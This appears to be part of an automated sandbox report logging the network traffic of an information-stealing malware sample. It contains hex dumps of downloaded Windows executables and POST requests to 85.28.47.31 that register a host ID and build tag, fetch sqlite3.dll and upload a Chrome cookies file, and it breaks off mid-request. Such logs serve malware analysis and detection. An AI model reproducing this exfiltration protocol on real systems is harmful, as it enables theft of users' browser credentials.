00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 10:01:19 GMTContent-Type: application/octet-streamContent-Length: 1904640Last-Modified: Sat, 27 Jul 2024 09:24:52 GMTConnection: keep-aliveETag: "66a4bce4-1d1000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 90 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4b 00 00 04 00 00 1b 6c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 75 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 75 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 6f 78 75 70 67 71 6a 00 00 1a 00 00 80 31 00 00 f8 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 61 70 61 70 73 64 7a 00 10 00 00 00 80 4b 00 00 04 00 00 00 ea 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4b 00 00 22 00 00 00 ee 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 10:01:22 GMTContent-Type: application/octet-streamContent-Length: 1933824Last-Modified: Sat, 27 Jul 2024 09:25:27 GMTConnection: keep-aliveETag: "66a4bd07-1d8200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4d 00 00 04 00 00 e4 81 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 d6 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 d5 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 79 77 7a 71 78 75 6c 00 70 1a 00 00 70 32 00 00 68 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 70 78 69 77 68 63 65 00 10 00 00 00 e0 4c 00 00 04 00 00 00 5c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4c 00 00 22 00 00 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 10:02:04 GMTContent-Type: application/octet-streamContent-Length: 249856Last-Modified: Sat, 27 Jul 2024 09:53:14 GMTConnection: keep-aliveETag: "66a4c38a-3d000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 67 94 73 10 06 fa 20 10 06 fa 20 10 06 fa 20 7f 70 51 20 0b 06 fa 20 7f 70 64 20 00 06 fa 20 7f 70 50 20 74 06 fa 20 19 7e 69 20 1b 06 fa 20 10 06 fb 20 64 06 fa 20 7f 70 55 20 11 06 fa 20 7f 70 60 20 11 06 fa 20 7f 70 67 20 11 06 fa 20 52 69 63 68 10 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8c 43 f1 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 76 03 02 00 00 00 00 f9 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 71 80 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 59 02 00 78 00 00 00 00 c0 04 02 e0 99 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 5a 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 54 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 bc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 19 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 33 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 
70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 75 66 75 63 00 00 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 69 78 65 72 61 79 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 99 00 00 00 c0 04 02 00 9a 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 10:02:07 GMTContent-Type: application/octet-streamContent-Length: 3206656Last-Modified: Sat, 27 Jul 2024 09:24:03 GMTConnection: keep-aliveETag: "66a4bcb3-30ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 95 bc a4 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 c6 08 00 00 00 00 00 28 ef ad 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 ae 00 00 04 00 00 31 92 12 00 02 00 40 80 00 00 80 00 00 20 00 00 00 00 80 00 00 20 00 00 00 00 00 00 10 00 00 00 50 50 8c 00 9b 0e 00 00 ec 5e 8c 00 4c 04 00 00 00 d0 12 00 e8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 50 8c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 8c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 00 10 00 00 00 00 05 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 03 00 00 c0 09 00 00 f2 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 0c 00 00 04 00 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 05 00 00 40 0d 00 00 f6 04 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 50 12 00 00 62 00 00 00 f0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 90 00 00 00 d0 12 00 00 8e 00 00 00 52 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 c0 78 00 00 60 13 00 00 28 03 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 f0 21 00 00 20 8c 00 00 e6 21 00 00 08 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
Host: 85.28.47.31
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKK
Host: 85.28.47.31
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 32 35 45 38 39 44 38 30 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 2d 2d 0d 0a
Data Ascii:
------HCAEHJJKFCAAFHJKFBKK
Content-Disposition: form-data; name="hwid"

B125E89D806E2371543510
------HCAEHJJKFCAAFHJKFBKK
Content-Disposition: form-data; name="build"

sila
------HCAEHJJKFCAAFHJKFBKK--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJD
Host: 85.28.47.31
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 2d 2d 0d 0a
Data Ascii:
------HIIIECAAKECFHIECBKJD
Content-Disposition: form-data; name="token"

c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b
------HIIIECAAKECFHIECBKJD
Content-Disposition: form-data; name="message"

browsers
------HIIIECAAKECFHIECBKJD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGD
Host: 85.28.47.31
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 2d 2d 0d 0a
Data Ascii:
------BAKFBKEHDBGHJJKFIEGD
Content-Disposition: form-data; name="token"

c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b
------BAKFBKEHDBGHJJKFIEGD
Content-Disposition: form-data; name="message"

plugins
------BAKFBKEHDBGHJJKFIEGD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="message"fplugins------DBGHJEBKJEGHJKECAAKJ--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJDGHCBGDHIECBGIDAEHost: 85.28.47.31Content-Length: 7211Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDHCAAKECFIDHIEBAKFHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 
4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; 